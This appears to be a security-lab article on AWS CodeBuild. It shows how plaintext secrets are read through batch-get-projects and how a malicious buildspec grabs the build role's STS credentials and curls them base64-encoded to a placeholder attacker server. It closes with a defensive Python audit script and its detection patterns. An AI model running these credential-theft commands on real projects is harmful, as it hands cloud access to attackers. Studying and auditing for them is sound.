CodeBuild - Security


We will discuss some interesting security implications of AWS CodeBuild.

Scenario I - Secrets

Secrets are often found in a CodeBuild project's environment variables or in its buildspec.yml. To view them, you need to know the project name and then make the following API call:
Here we assume the project name is securitylabs-articles.
aws codebuild batch-get-projects --names securitylabs-articles --region us-east-2
The API call outputs the buildspec.yml and the environment variables configured in the project. Only variables of type PLAINTEXT are returned with their literal value; variables of type PARAMETER_STORE or SECRETS_MANAGER appear as a reference to the parameter or secret, which is why credentials should be stored that way rather than as PLAINTEXT.

Scenario II - Stealing STS Tokens

A malicious buildspec.yml can be used to steal the STS credentials of the role attached to the CodeBuild project.
The commands below, added to the buildspec, exfiltrate the CodeBuild STS credentials:
# Fetch the build role's STS credentials from the container credential endpoint
curl -qL "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -o aws_credentials.json
# Load the extracted credentials into the AWS CLI configuration
aws configure set region 'ap-south-1'
aws configure set aws_access_key_id "$(jq -r '.AccessKeyId' aws_credentials.json)"
aws configure set aws_secret_access_key "$(jq -r '.SecretAccessKey' aws_credentials.json)"
aws configure set aws_session_token "$(jq -r '.Token' aws_credentials.json)"
# Base64-encode the credentials file and send it to the attacker's server (placeholder host)
encoded=$(base64 -w 0 ~/.aws/credentials)
curl "https://<your-server>/?c=$encoded"
The first curl request returns the STS credentials. The environment variable $AWS_CONTAINER_CREDENTIALS_RELATIVE_URI holds the credential path, in the format /v2/credentials/<build_id>; since the build ID is dynamic and not easy to guess, we use this variable, which is set in every build container, to obtain the credential path.
Once the STS tokens are saved in aws_credentials.json, we configure the AWS CLI with the extracted credentials; finally, ~/.aws/credentials is base64 encoded and sent to our server to exfiltrate the STS tokens.
The screenshot below shows the base64-encoded credentials that were exfiltrated from CodeBuild.
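The two scenarios above can be audited from the defender's side with the same batch-get-projects output: flag secret-like variables stored as PLAINTEXT (Scenario I) and buildspec commands that read the build container's credential endpoint or the CLI credentials file (Scenario II). The following script is an added example, not code from the original page; the project JSON it parses is constructed to mirror the batch-get-projects response shape, and the name patterns it matches are assumptions you should tune.

```python
"""Audit CodeBuild project JSON (as returned by `aws codebuild batch-get-projects`)
for plaintext secrets and for buildspec commands that read the build role's STS
credentials. Added example; the sample project below is constructed."""
import json
import re

# Environment variable names that usually hold credentials (assumed patterns).
SECRET_NAME_RE = re.compile(r"(SECRET|PASSWORD|PASSWD|TOKEN|API_KEY|ACCESS_KEY)", re.I)
# Buildspec fragments that indicate credential harvesting inside the build container.
CREDENTIAL_READ_PATTERNS = [
    "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI",  # path to the container's STS credentials
    "169.254.170.2",                            # container credential endpoint host
    ".aws/credentials",                         # CLI credential file being read
]

def audit_projects(batch_get_projects_json: str) -> list:
    """Return one finding per issue: a PLAINTEXT secret-like variable, or a
    buildspec line that touches the build role's credentials."""
    findings = []
    for project in json.loads(batch_get_projects_json).get("projects", []):
        name = project.get("name", "<unknown>")
        for var in project.get("environment", {}).get("environmentVariables", []):
            # PLAINTEXT values are visible to anyone with codebuild:BatchGetProjects;
            # PARAMETER_STORE / SECRETS_MANAGER values are only references, so skip them.
            if var.get("type", "PLAINTEXT") == "PLAINTEXT" and SECRET_NAME_RE.search(var["name"]):
                findings.append({"project": name, "kind": "plaintext_secret", "detail": var["name"]})
        buildspec = project.get("source", {}).get("buildspec") or ""
        for lineno, line in enumerate(buildspec.splitlines(), 1):
            if any(p in line for p in CREDENTIAL_READ_PATTERNS):
                findings.append({"project": name, "kind": "credential_read",
                                 "detail": f"line {lineno}: {line.strip()}"})
    return findings

# Constructed sample resembling batch-get-projects output for one project.
SAMPLE = json.dumps({"projects": [{
    "name": "securitylabs-articles",
    "environment": {"environmentVariables": [
        {"name": "DB_PASSWORD", "value": "hunter2", "type": "PLAINTEXT"},
        {"name": "API_TOKEN", "value": "/prod/api-token", "type": "PARAMETER_STORE"},
        {"name": "BUILD_ENV", "value": "prod", "type": "PLAINTEXT"},
    ]},
    "source": {"buildspec": "version: 0.2\nphases:\n  build:\n    commands:\n"
               "      - curl -s http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI\n"
               "      - make test\n"},
}]})

if __name__ == "__main__":
    for f in audit_projects(SAMPLE):
        print(f"{f['project']}: {f['kind']} -> {f['detail']}")
```

In a real audit, feed the script the JSON from `aws codebuild batch-get-projects --names ...` across all projects returned by `aws codebuild list-projects`.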